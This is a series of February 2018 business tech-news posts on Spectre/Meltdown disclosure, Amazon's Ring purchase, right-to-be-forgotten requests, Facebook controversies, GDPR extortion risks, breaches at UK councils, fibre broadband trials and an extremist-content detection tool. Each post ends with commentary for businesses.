Intel Didn’t Reveal Chip Flaws To Authorities First

It has been revealed that US authorities found out about the Spectre and Meltdown chip flaws from media reports rather than being informed directly by US computer chip manufacturer Intel.

What Chip Flaws?

Back in January, researchers from Google's Project Zero, the Technical University of Graz in Austria and the security firm Cerberus Security in Germany, discovered that two major security flaws are present in nearly all modern processors / microchips. The hardware flaws were dubbed ‘Spectre’ and ‘Meltdown’.

Meltdown affects all Intel, ARM and most other processors on the modern market. It is believed that Meltdown could affect every processor since 1995, except for Intel Itanium and Intel Atom before 2013. The flaw could, for example, leave passwords and personal data vulnerable to attacks.

Found Out Via The Media

In this latest revelation, news has emerged that Intel didn’t inform US cyber-security officials about the flaw in its processors until after the news had been leaked to the media.

Google’s parent company Alphabet has said it informed Intel, AMD and ARM about the chip flaws in June 2017, and the three semiconductor / chip manufacturers were given 90 days to fix the flaws before disclosing the discovery of the flaws and the fix to the public. According to Alphabet, and in keeping with ‘standard practice’, it had left it up to the companies to decide whether they should inform government officials about the security flaws.


In response, Intel gives a slightly different version of events. According to Intel, Google Project Zero had chosen to extend the 90-day timeframe to 9 January 2018, and Intel had agreed to keep the information confidential until that date.

No Exploits Anyway

Even though there is general agreement that the security flaws are now present in nearly all modern devices, including all iPhones, iPads and Macs, Intel has been quick to stress that there have been no known exploits to date.

What Does This Mean For Your Business?

It is worrying that ‘standard practice’ in the industry allows a security problem to be kept quiet from government cyber-security officials, and from the public, for 3 months. It is also worrying that it took journalists to uncover the problem, particularly when you consider the sheer scale of the flaws i.e. that they’re present in almost all modern processors.

There have been far too many stories of large, well-known companies choosing to keep quiet as long as possible about cyber / data security risks or breaches, and these episodes all serve to undermine confidence that companies will act responsibly themselves, without the threat of new regulations and huge fines (such as those that GDPR will bring).

The best advice to businesses is now to install all available patches for the flaws without delay, and to make sure that you are receiving updates for all your systems, software and devices.
Regular patching is a good basic security habit to get into anyway. Research from summer 2017 (Fortinet Global Threat Landscape Report) shows that 9 out of 10 impacted businesses are being hacked through un-patched vulnerabilities, and that many of these vulnerabilities are 3 or more years old, and there are already patches available for them.

Amazon’s $1 Billion ‘Smart Doorbell’ Purchase

Amazon has paid $1 billion for ‘Ring’, a smart doorbell company, so that it can improve how it delivers parcels, and compete with Google and Apple in expanding the opportunities for their digital assistants and app ecosystems.

What Is Ring?

Ring, run by CEO Jamie Siminoff, is a US company that primarily manufactures ‘smart doorbells’. These doorbells work by recording live videos of customers’ doorsteps, then sending the videos to their smartphones.

Filming Couriers

There are obvious security benefits for customers from an innovative IoT product of this kind. In this case, however, there is also a big benefit for Amazon in helping its customers trust its new service, which allows couriers to open people’s front doors and put deliveries inside. The new service, which was first announced in October last year, requires a leap of faith from customers, as they have to trust couriers to enter their premises unaccompanied to deliver parcels (while being filmed).

In the original plans for the service, smart locks and Cloud Cam cameras were to be used to monitor couriers, who would scan a package barcode outside the door. Once the delivery had been verified online, the camera would record the delivery person unlocking the door (using an app) and making the delivery. The purchase of ‘Ring’ enables Amazon to acquire the system to operate this service effectively in the marketplace very soon.

Part Of A Bigger Battle

The purchase of Ring for $1 billion is further serious evidence of Amazon competing with multiple rivals for all aspects of our homes, and invariably, our business premises.

For example, back in September 2017, Nest (owned by Alphabet / Google) released an internet-connected intruder alarm, a video-streaming doorbell, and a door lock system that was developed in collaboration with Yale. Nest has also just announced that it will be incorporating Google Assistant into its products so that they will work with Google Home.

It is, therefore, not just the lure of the lucrative and growing smart home security market that Amazon has been interested in, but also the competition among the big players – Google, Apple and Amazon – to link up their digital assistants with many different smart home devices e.g. to control the lighting, heating, and now the security.

What Does This Mean For Your Business?

Many businesses receive frequent parcel deliveries during the day, and this type of service may, therefore, be a useful one (particularly for smaller businesses), and could minimise disruption and help efficiency. Amazon has the parcel delivery network, the services e.g. Amazon Business (its online trade counter), and now its point of delivery security system.

This product is an example of how multiple technologies have linked together to provide another new business opportunity in a new and growing market. Some critics have, however, pointed out that this service requires some serious faith and trust from customers, and that it would only take a few incidents to kill that trust and to force the expensive idea onto the back burner. There is still, of course, the broader, general problem of IoT security, which has not been fully addressed in many other products, and could still prove to be the Achilles Heel in this one.

This story is also an example of how Amazon is expanding and diversifying into many different aspects of our home and business lives e.g. parcel delivery, groceries, and now smart security. The story is also an example of how the big home digital assistant manufacturers are now locked in competition to expand the number of products and services that link up to their devices e.g. Amazon Echo, and this market could provide many business opportunities for many other tech companies and manufacturers along the way.

Google Acted On Less Than Half Of Requests To Remove URLs

Google’s latest Transparency Report reveals that of the 2.4 million requests made since 2014 to remove certain URLs from its search results, Google has only complied with less than half.

Removal Requests

The removal requests relate to a ruling by the European Union's Court of Justice in May 2014 which said that Google and other search engines can be held responsible for personal data that appears in their search engine results pages - they are considered to be ‘Data Controllers’. Google and other search engines can, therefore, be asked to remove links to some web pages that are published by third parties, and any EU citizen can ask Google to remove information about them from its search results.

Doesn’t Have To Comply

The problem with the ruling for individuals who want their data removed is that Google doesn’t actually have to comply with the request, and can refuse to take links down if it can demonstrate that there is a public interest in the information remaining in the search results. Google can also re-instate links that it has already taken down in a previous request if it can show that it has grounds to do so.

One example highlighted in Google’s Transparency Report concerns the UK man who managed to get Google to delist 239 (of 300) URLs that linked him to a fraud conviction where he was later found to be innocent. Following a 2nd request by the same man to remove pages relating to a benefits case linked to him, Google refused this request AND re-instated the previously de-listed URLs because it said that he provided forged documents with his 2nd request.

Two Main Reasons

The statistics appear to indicate that the two most likely reasons why Google would be asked to consider de-listing URLs are when they relate to personal information being shown in social media and directory services, and when aspects of a requester's legal history from news outlets and government websites are shown in the search engine results.

What If Google Refuses Your Request?

Examples of why Google may refuse to take URLs down include when they give business information that might be useful for potential customers, or if the content about a violent crime could be of interest to the general public.

If Google refuses your request to take down certain URLs, you can then still take your complaint to the national data watchdog. This, of course, takes time.

Less Than Half Of Requests

The Transparency Report shows that, since May 2014, Google has not delisted 56.7% of URLs, and in the UK, 60.2% of requests to remove certain URLs were not complied with by Google.

What Does This Mean For Your Business?

This story appears to show that despite an EU ruling, Google is still really in charge of making the decision about whether your personal details appear in its search engine results, based on its own research rather than your reasons in your request. For businesses wanting to hide certain information from public view, this is clearly an obstacle. Many businesses and individuals may have arguably suffered a much longer lasting punishment for any wrongs or from any bad publicity simply because they now operate in the age of the Internet, where things take a long time to be forgotten.

It will be interesting to see what difference GDPR makes to this situation because with GDPR, any EU citizen has the ‘right to be forgotten’ (all data held about them is to be removed), and GDPR can be enforced with the help of substantial fines for companies failing to comply with requests from individuals.

Google has long appeared to take the position that it sees some requests to remove certain URLs from its search engine results as a kind of censorship, and it remains to be seen just how much influence individuals will be able to exert over the big internet companies in the coming years.

Facebook Shooting Game Gaffe

Facebook has faced criticism this week after news that it promoted a virtual reality shooting game set in a public train station, on its stand at a US conservatives' event.

Bad Timing

Clearly, in the light of the latest mass school shooting incident in Florida where a gunman killed 17 victims, it appeared to be a poor decision by Facebook to take the ‘Bullet Train’ game to the event.

The game, which Facebook says is a free title first unveiled in 2015, and was bundled with a number of other VR demos at the event, allows the player to shoot imaginary weapons against enemies in the setting of a public train station.


Adding to the weight of criticism of Facebook for airing the game is the fact that the event was a right-wing CPAC conference where the National Rifle Association (NRA) has promoted gun rights. It has also been reported that CPAC featured speeches attacking gun control advocates, and a much criticised call from Donald Trump to give guns to school teachers.

It is darkly ironic that at a conference that had been dominated by discussions over gun control following a school shooting, delegates were then able to play a VR game which involved shooting people in a public place.

Exposed Via Twitter

News of the use of the game at the event was made public when a journalist at CPAC took to Twitter to post footage of the game being played.

Facebook has since expressed regret for promoting that particular game at the conference, and has announced that it has removed Bullet Train and any other action games that include violence from the VR demo.

Bad Few Weeks For Facebook In The Media

This latest gaffe is another in a series of stories in the media that have generated some bad publicity for Facebook over the last couple of weeks.

For example, last week Facebook faced criticism for allegedly using registrations to 2 factor authentication as an opportunity to send out spam SMS notifications. Any requests to stop the texts were also reported to have been posted onto the user’s Facebook profile page. In the same week, a court in Belgium told Facebook to stop using tracking code to follow and record internet use by people who weren’t even Facebook users, until it complies with Belgium’s own privacy laws.

Facebook has also received some very bad publicity since it released figures showing that Russia-based operatives uploaded 80,000 posts to Facebook in the last 2 years, and thereby may have been able to influence the outcome of the last US election.

Not Allied To Any Political Party

Even though this latest shoot-em-up game gaffe took place at a right-wing event, Facebook has also been quick to stress that it routinely participates in events hosted by organizations across the political spectrum.

What Does This Mean For Your Business?

At the very least, this is an example of how reviewing and checking every aspect of anything you’re presenting and promoting at a high profile event, coupled with a final reality-check, is always worthwhile if you want to avoid any unnecessary bad publicity.

This story is also a reminder that we live in an age where we are constantly connected to a worldwide news network where social media can be used to instantly broadcast any errors that companies, organisations and governments make.

This story also reminds us that the activities of powerful internet companies are now under scrutiny by campaign and other interest groups, and in today’s environment, the stories of individuals rather than governments about their experiences with big internet companies can become quite powerful in keeping those companies in check and holding them to account once those stories gain momentum and mass on social media.

Monday, February 26, 2018

Belgium Says No To Facebook Tracking Code

A court in Belgium has told Facebook to stop using tracking code to follow and record internet use by people surfing in Belgium, until it complies with the country’s own privacy laws.

What’s The Problem?

According to Belgium’s privacy watchdog, the Belgian Commission for the Protection of Privacy (CPP), Facebook placed tracking code in the form of ‘cookies’ on third-party websites. This would mean that Facebook’s actions did not comply with Belgium’s privacy laws because:
  • It tracked people without consent.
  • It tracked people who were not Facebook users.
  • It (presumably) stored the tracked personal data that it obtained illegally in the first place.

What Now?

If Facebook fails to comply with Belgium’s CPP it could face fines of £221,000 per day.

Industry Standard

Facebook is reported to have expressed disappointment at the verdict and has stated that it is simply using the same industry standard cookies and pixels that other EU businesses use to help them grow their business.


This latest case appears to be the latest round in a long-running, ongoing dispute between the social media giant and the CPP. For example, back in November 2015, the CPP won a case against Facebook concerning the tracking of people with a ‘datr cookie’ when they visited pages on the site and clicked on like or share, even if they had never registered for an account, or if they had but weren’t even logged in.

Facebook was able to appeal and win an overturning of the verdict because it was judged that Belgian courts didn’t have international jurisdiction over Facebook Ireland i.e. because the data collected by the cookies was stored on servers in Dublin, the European base of Facebook’s operations.

The CPP then indicated that it would try to appeal against Facebook’s successful appeal through Belgium’s court of cassation, using a Yahoo case as an example. With Yahoo, for example, it was ruled back in 2015 that finding against Yahoo wouldn’t have to mean intervention outside of Belgium, and that, since Yahoo actively participated in the economic life of Belgium by using the domain name .be or displaying ads based on users’ location e.g. in Belgium, it voluntarily submitted itself to Belgian law.

What Does This Mean For Your Business?

This story has commercial, legal and political aspects to it. Cookies can provide useful information and functions for businesses e.g. helping to personalise user browsing experiences, and gathering information about users of the company website - usually with an initial registration of consent by users of a website.

With this Facebook case, as web users, we may feel uneasy that trusted companies may be tracking all-comers without consent. This kind of story reminds us all about the importance of privacy and security, and it’s worth remembering that cookies sent over the web without encryption i.e. if the website doesn’t have HTTPS in front of the domain, could be a security risk because they are readable by anyone on a network and could expose sensitive data e.g. credit card details, e-mail address and more. Google, for example, has just announced that from July, Chrome will be labelling websites without HTTPS as ‘Not Secure’ to try and combat this kind of risk.

The legal aspect of this case relates to which country has jurisdiction over the actions of a company whose services are used in that country, but the HQ and the data storage are in another country. This is another long-running legal argument e.g. Apple’s tax breaks in Ireland.

Many see the EU and people like the EU’s commissioner for competition, and measures like greater regulation and taxation as being useful to curb some of the more suspect behaviour of the big US Internet companies in Europe.

The introduction of GDPR should also provide greater protection for EU citizens in terms of online privacy and security. The UK will soon not be an EU member, but will have its own similar Bill added to UK law, but this could produce more legal grey areas.

There is clearly a political dimension to this story too as Belgium seeks to hold a powerful overseas company to account, and it wouldn’t be the first time that an EU country has tried to do this.

Facebook In Authentication Spamming Row

Facebook is facing criticism for allegedly using sign-ups to 2 factor authentication as an opportunity to send spam SMS notifications.

What 2FA?

Facebook has been allowing users to sign up for SMS-based two-factor authentication to mitigate the risk of phishing attempts and to help protect people from having their accounts compromised.

Spam Too

Unfortunately, in addition to receiving the authentication texts / security tokens that they expected, some sign-ups have also reported receiving what are essentially extra spam texts from Facebook with links to other things happening on the social network.

To make matters even worse, any replies to the spam texts e.g. requests to stop the texts, were reported to have been posted onto the user’s Facebook profile page.

Facebook Sorry

After complaints were received, Facebook released a statement saying that it was sorry for any inconvenience caused, and that it was not their intention to send non-security-related SMS notifications to the phone numbers that customers had submitted as part of the two-factor authentication service.

With regards to posting customer replies to the spam texts on their own Facebook profiles, Facebook explained that this was a throwback to a time before the ubiquity of smartphones when Facebook supported posting to profiles via text message. Facebook admitted, however, that this feature is now less useful, and that it would soon be deprecated.

Bad Publicity In Europe

This incident comes on top of plenty of recent bad publicity in Europe for Facebook. Firstly, after a dispute dating back to 2015 where Facebook fell foul of Verbraucherzentrale Bundesverband (vzbv), or Federation of German Consumer Organisations, a German court has just ruled that Facebook didn’t do enough to alert people to the pre-ticked privacy settings on its mobile app. It also found that eight clauses in Facebook's terms of service were invalid, including terms that allow Facebook to transmit data to the US and use personal data for commercial purposes.

In a separate long-running spat, this time in Belgium, Facebook lost in a court case with Belgium’s privacy watchdog, the Belgian commission for the protection of privacy (CPP), where it was ruled that Facebook failed to comply with Belgian privacy laws. This time, it was found that Facebook had been using cookies to track people who may or may not have been Facebook users without their consent, and then stored the tracked personal data that it obtained illegally in the first place.

What Does This Mean For Your Business?

As well as highlighting how it appears that the behaviour of some big US Internet companies in Europe is being closely monitored (and needs to be), it highlights how data privacy laws and courts differ in different countries.

This story also brings into focus the importance of the imminent introduction of GDPR in May this year, which should go some way to making data privacy and security laws more uniform and consistent across the EU region. Even though the UK won’t be in the EU soon, GDPR will apply initially, and then the Data Protection Bill (DPB) will replace the Data Protection Act 1998, and will essentially transfer the EU’s GDPR into UK law for the future.

On the subject of GDPR, businesses should be reminded that we have now passed what is known as ‘X-Day’ (100 days from GDPR’s introduction), and that businesses and organisations need to quickly adopt an automated, classification-based, policy-driven approach so that they can meet the regulatory demands within the short time frame available.

In relation to the Facebook case of ‘accidental’ spam after sign-ups for the SMS-based two-factor authentication service, this behaviour would contravene GDPR because, under GDPR, the users would have only given consent for the 2FA service, and not for anything else. GDPR may, therefore, make companies think very seriously about what SMS and email messages they send to user groups based on their initial consent. The whole area of consent and GDPR is something that will need more discussion and clarification to help businesses understand the new boundaries for their online marketing.

GDPR Extortion Prediction

A report by Security Company Trend Micro has predicted that, as cyber criminals are now focusing more on maximising financial return, the introduction of GDPR this year could give them potentially lucrative extortion opportunities.


The point that this report is making is that, with the prospect of massive fines under GDPR e.g. fines up to €20 million, or 4% of their global turnover, criminals could extort large sums of money from companies with the threat of a cyber attack that could lead to a data security breach, which could in turn lead to a fine under GDPR. It has been suggested that criminals could first determine the penalty under GDPR that could result from an attack, and then demand a ransom of slightly less than that fine.

What’s Happening?

The recent trends in cyber crime are what have led to this latest chilling prediction. For example, the fact that cyber criminals appear to be abandoning exploit kits and indiscriminate attacks in favour of more strategic attacks with maximised financial gain is a trend that has become more apparent. This trend, coupled with the fact that, although the number of reported breaches in 2017 was lower than in 2016, the amount of data compromised by cyber attacks increased, has led security commentators to believe that criminals will seek to exploit GDPR as a money-making weapon.

Predictions Started Last Year

Predictions that the threat of GDPR fines could be exploited by criminals first surfaced in the media last November when researcher Mikko Hypponen made the point that GDPR fine figures could give cyber-criminals who are using ransomware, or hackers stealing data, a price point to set the ransom at because now they know how much money they should be asking.

Hypponen argued that because the criminals know what data is worth / what covering up a data breach may be worth to some companies (probably large, well-known ones), these companies may be actually willing to pay anything less than the full amount of the fine to avoid serious damage to their reputation, loss of customers and more.

According to Hypponen, ransoms could, therefore, be set at up to 2% or 3% of the targeted organisation’s global annual turnover. This could equate to millions of dollars in some cases.

Threat Of Reporting Too

As well as the threat of a ransom to avoid a direct, deliberate attack that would result in a fine, security commentators have also suggested that hackers / scammers could steal data with advanced ransomware and then blackmail the victims with the threat of reporting them to the data protection commissioner. This is because ransomware can affect the availability, access, and recovery of personal data.

Other Trends

Other trends uncovered in the recent Trend Micro report include:
  • A 32% increase in new ransomware families from 2016 to 2017.
  • A doubling of business email compromise (BEC) attempts between the first and second half of 2017.
  • Rapidly rising rates of cryptocurrency mining malware (100,000 detections in October).
  • A 22% increase from 2016 in BEC attempts to trick company employees into approving money transfers to criminal accounts, mostly targeting the chief financial officer (CFO).
  • More attacks on vulnerable internet of things (IoT) devices, with software vulnerabilities also continuing to be targeted (1,009 new flaws discovered and disclosed in 2017).

What Does This Mean For Your Business?

As well as being an opportunity to get the (data) house in order and to enhance competitiveness (GDPR compliant companies are more likely to want to deal with other compliant companies), the size of the fines and now the potential activities of extortionists are risks for the coming years for UK businesses. Even though these predictions relate to more daring and sophisticated crimes, companies should still make sure that they are at least covered against more basic attempts e.g. by keeping up to date with software patching, and covering all known vulnerabilities.

Ways that companies could protect themselves against hacking / ransomware threats include only giving users access to what they need and taking away admin privileges, backing up all critical files effectively and securely, and testing those backups to make sure that information can be restored in a usable form. Training of staff e.g. chief financial officers (CFOs) or anyone involved in payment, and establishing a clear process for checking and chain of command could reduce the risk of BEC attempts and socially engineered attacks. Businesses would also be wise to make sure that their Business Continuity and Disaster Recovery Plans are kept up to date in the light of emerging threats.

More security commentators are also now warning businesses against the potentially devastating combination of security oversights, increasingly aggressive threats and, perhaps, carelessness in some aspects of cyber and data security.

Facebook Postcards To Combat Election Interference

Following disclosures of how Facebook was used by advertisers who may have been seeking to influence the US election result, Facebook has suggested that in future in the US, those backing candidates with advertising campaigns will receive a ‘snail mail’ postcard sent by Facebook with a verification code.

Ads Mentioning A Candidate

The measure is reported to be only applicable to those who run adverts mentioning a specific candidate, rather than paying to promote a political message e.g. a policy. The verification code sent on the postcard can then be used to confirm the advertiser lives in the United States.

Won’t Solve Everything

Facebook’s global director of policy programs, Katie Harbath, has reportedly acknowledged that the postcard idea may not solve all the problems, but it is the most effective solution that the company could come up with for the time being to stop similar illegal activity happening on its platform.

How Bad Was It?

Back in November, Facebook released figures ahead of its Senate hearing showing that Russia-based operatives uploaded 80,000 posts to Facebook in the last 2 years. Taking into account posts published between June 2015 and August 2017, it is believed that 29 million Americans saw the posts directly, and that 26 million American users may have seen, and perhaps been influenced by, liked and shared messages and comments that could have originated in Russia.

Also, US Special Counsel Robert Mueller said recently that no fewer than 13 Russians and three Russian companies are believed to have committed criminal offences by using social media to interfere in the US election.

What Does This Mean For Your Business?

It does seem a little ironic that one of the world’s most famous Internet companies must resort to ‘snail mail’ to solve a major problem, but as the company says, it seems like the only effective option for now. It would also be easy to see how this overt, but fairly limited option could be gotten around by e.g. determined state sponsored players.

The bigger picture of the whole election result influence story (i.e. which party / candidate wins) is that it has a big effect on the business environment as well as on society. It is not a surprise that one country could seek to influence events in another, but it is a surprise to some people that tech companies and social media companies are still able to offer such a powerful voice and a channel to all.

The challenge that tech companies such as Facebook and Google (with YouTube) face is that they need to protect the idea that they reject censorship and interference from governments, while still being seen to be acting responsibly and proactively, while also protecting their brands and monetising elements of their business at the same time.

The election revelations have just served to add fuel to the arguments of governments and politicians, both in the US and the UK, that they don’t have more of an influence over social media and tech companies e.g. with the end-to-end encryption debate in the UK, and that they often only come up against lawyers for these companies rather than being able to be seen to be publicly grilling the owners of these tech giants themselves.

A Quarter Of Councils Have Been Hacked

A freedom of information request by privacy campaign group Big Brother Watch has revealed the shocking statistic that a quarter of all UK councils have had their IT systems breached in the past five years.

37 Attempted Cyber Attacks Every Minute

The ‘Cyber Attacks In Local Authorities’ report from Big Brother Watch shows that local governments are subject to cyber attack attempts at the staggering rate of 37 per minute!

Thankfully, only a tiny fraction of the attacks launched are successful although this still represents a serious problem. For example, 114 councils experienced at least one incident between 2013 and 2017.

High Stakes

The nature of the work of UK Councils is such that they hold a large amount of up-to-date personal data for people in their areas, so one successful breach can have very serious consequences.

Not Disclosing Breaches

One particularly worrying aspect of council behaviour exposed by the report is that, from the data gathered, few seem to have reported losses and breaches of data, which is something that organisations will be required to do within 72 hours under GDPR when it comes into force in May.

Human Error - Training Needed

As in so many companies and organisations, human error is often a factor in breaches. In 2015, for example, Big Brother Watch exposed how local authorities committed 4 data breaches a day, all thought to be predominantly caused by human error.

Big Brother Watch has also revealed that, despite the number and seriousness of the breaches, little action has been taken by UK councils to increase staff awareness and education in matters of cyber security and data protection. For example, it has been disclosed that 75% of local authorities do not provide mandatory training in cyber security awareness for staff, and that 16% do not provide any training at all!

What Does This Mean For Your Business?

Some commentators have been quick to point out that bearing in mind how much sensitive data councils hold about citizens, and the incredible amount of attempted cyber attacks against them, they could be making more of an effort and an investment to beef-up security.

Other commentators have noted that cuts to council budgets e.g. with austerity measures may have played their part in limiting cyber security effectiveness in UK councils.

After the shocking findings of the report, Big Brother Watch issued some recommendations to local authorities which could very well apply to other businesses and organisations. These are:
  • Cyber security should be prioritised and, rather than investing too much in surveillance technologies, more should be invested in cyber security strategies and in the training of staff.
  • Cyber security incidents should be consistently reported, and a protocol needs to be established so that incidents are reported quickly and to the right authorities e.g. the police, the ICO, and the National Cyber Security Centre.
  • All staff should receive mandatory training in cyber security because cyber attacks are not only designed to breach computer systems, but also to exploit humans, who are often the weakest cyber security link.

Monday, February 19, 2018

10 Gbps Home Broadband Speed Achieved In Test

Broadband operator Hyperoptic is reported to have achieved home broadband speeds of up to 10 gigabits per second (Gbps) in a recent test.


‘Hyperoptic’ is the company name in this case, but the term hyperoptic generally refers to the kinds of super speeds that can be achieved with full fibre / fibre-to-the-building / fibre-to-the-home / 'fibre-to-the-premises' infrastructure and packages.

A First

The result of the test, which was carried out in a home in the former Olympic village in east London (presumably because it is fully fibre linked), is thought to be the first time that such speeds have been brought to a UK home using an existing ISP network rather than a dedicated line.

How Fast Is That?

Quoted broadband speed figures are often not what they seem, but speeds of up to 10 gigabits per second would mean that:
  • A standard HD movie file (5GB) could be downloaded in 4 seconds, compared with 6 minutes 40 seconds on a 100Mbps connection.
  • A 25GB Xbox game could be downloaded in 20 seconds, compared with more than 33 minutes on a 100Mbps connection.
  • The latest full 4K ultra high definition movie (75 GB) could be downloaded in just 1 minute, compared to 1 hour 40 minutes on a 100Mbps connection.

Why Do We Need Hyper Speeds?

Spending more time on more powerful gadgets / mobile devices, the growth of the subscription economy for services, the continued growth of online shopping, the growth of the cloud, the popularity of gaming, video and social media programs, the popularity of TV / Film and other media streaming services, the demand to download bigger and better quality files, and the frustration of buffering and slow connections over many years have all stimulated UK demand for better and faster connections. Also, more businesses are looking to future-proof their networks, and they feel that much faster connections are needed for effective global business competitiveness.

As things stand, a recent survey by found that the UK ranks only 31st in the world for average broadband speeds, with an average broadband speed of just 16.51Mbps.

Trials of Full Broadband In 6 UK Regions

Back in September, the UK government announced that six regions of the UK would be hosting trials of full fibre broadband for businesses, schools and hospitals as part of a £200m scheme by the Department for Digital, Culture, Media & Sport (DCMS).

According to the DCMS, £10 million of the total £200 million budget will be spent on trials for full fibre broadband in Aberdeen and Aberdeenshire, West Sussex, Coventry and Warwickshire, Bristol and Bath & North East Somerset, West Yorkshire and Greater Manchester.

Commitment From Big Providers

The big UK broadband providers are making more of a commitment to the kind of full-fibre connections that could bring much faster speeds. For example, BT has promised to bring full-fibre connections to 3 million premises by 2020, 700,000 of which will be in rural areas. Also, TalkTalk has announced a big investment in infrastructure which will bring full-fibre technology to 3 million homes and businesses.


Despite this recent announcement by Hyperoptic, there are many valid criticisms about any big plans for boosting broadband speeds with the widespread use of fibre-optic cables in the UK including:

  1. Even if you have a fibre-optic cable to your home / business premises, there will still be shared traffic points in the network which will slow down your broadband at certain times.
  2. Full fibre-optic, ultra-fast broadband is not likely to be a reality in the UK anytime soon. At the current rate, BT Openreach has stated that only two million premises will have access to ‘full fibre’ by the end of 2020.

What Does This Mean For Your Business?

The test by Hyperoptic is really just a tantalizing view of what could be possible if we all had full-fibre broadband up to our premises, and a fabulous UK fibre infrastructure. Obviously, that could bring considerable value-adding, cost-saving, competitiveness-boosting benefits to UK businesses.

Sadly, the current reality is that businesses don’t have (and look unlikely to have any time soon) access to the kind of speeds that overseas companies (e.g. competitors) enjoy, and certainly don’t have access to the speeds that the Hyperoptic test was demonstrating.

Whilst it is good that funding and momentum for the task of delivering faster (fibre or fibre/ broadband for UK businesses looks to be increasing, the UK has a long way to go, and the reality is that we may only actually have 7% full fibre coverage by 2020.

In terms of what it actually means for a business to be physically connected to a fibre broadband infrastructure, technical commentators say it will be a case of simply having a small box installed on the premises. In terms of costs, it seems likely that faster full-fibre packages will be an opportunity for ISPs to charge more.

UK Government Unveils Online Extremism Blocker

Home Secretary Amber Rudd has unveiled the UK government’s new tool for detecting and blocking online extremist and jihadist content.

Publicly Funded

The new tool was developed by artificial intelligence company ‘ASI Data Science’ based in London, and was funded using £600,000 of public funds.

Tackling A Growing Problem

The tool was developed to tackle the growing problem of extremist / jihadist (e.g. IS) content being posted online, and of current moderating techniques simply not being able to keep up with the job of detecting and removing it fast enough. For example, as well as the popular video platforms for posting such content, the Home Office estimates that between July and the end of 2017, extremist material appeared in almost 150 web services that had not been used for this kind of propaganda before.

An ASI Data Science spokesperson is reported as saying that there are currently over 100 different (extremist / IS) videos posted on over 400 different platforms online.

The danger is of course, that the material can contribute to the promotion of extremist causes, the radicalisation of people, the recruitment of new terror group members, and inspiring individuals / groups to commit their own acts of terror. Some of the content can also be very disturbing e.g. if viewed by children online.

How The New Tool Works

The new tool is reported to have an AI element which has enabled it to be ‘trained’ to correctly pick out extremist content. For obvious reasons, the exact workings of the tool are being kept secret, but it is understood that the tool uses an algorithm to detect signals that contribute to a level of probability (low to high) that a video is likely to be terrorist propaganda rather than e.g. a legitimate news video. The tool can be applied at the point of upload on a video platform, thereby stopping the propaganda video from being uploaded in the first place.

This tool is reported to be able to accurately detect 94% of IS video uploads, and to typically flag 0.005% of non-IS video uploads. On a site with five million daily uploads, for example, it would flag 250 non-IS videos for review / for a human decision to be taken.

Others Have Tried

Facebook and Google are known to have been trying to develop their own terror material filtering tool, and this UK version is thought to be suitable for use by smaller platforms first.

Home Secretary Says.

Home Secretary Rudd is reported as saying that even though the tool has been developed, the UK government won’t rule out taking legislative action too where necessary, and that an industry-led forum such as The Global Internet Forum to Counter Terrorism, launched last year, will also help to tackle the issue.

What Does This Mean For Your Business?

For businesses using the smaller social media and video platforms, this tool could be a practical solution to current moderation problems. For the UK government, it provides some good publicity, a chance to gain back some ground in the online battle with terror groups such as IS, and a way to be seen to be tackling worries of radicalisation of UK citizens. It also provides a way for the Home Secretary to apply more pressure to the popular social media platforms, some of which the UK government has criticised for not taking enough fast action to detect and remove extremist content.

For UK businesses generally, association with and use of advertising platforms that are free of extremist and unsavoury material is obviously better from a brand protection point of view. It is, however, a fact that Facebook and Google are hugely important for business advertising, and that PPC advertising for example, is unlikely to be affected by whether the chosen video / social media platform adopts such a screening-tool in the near future.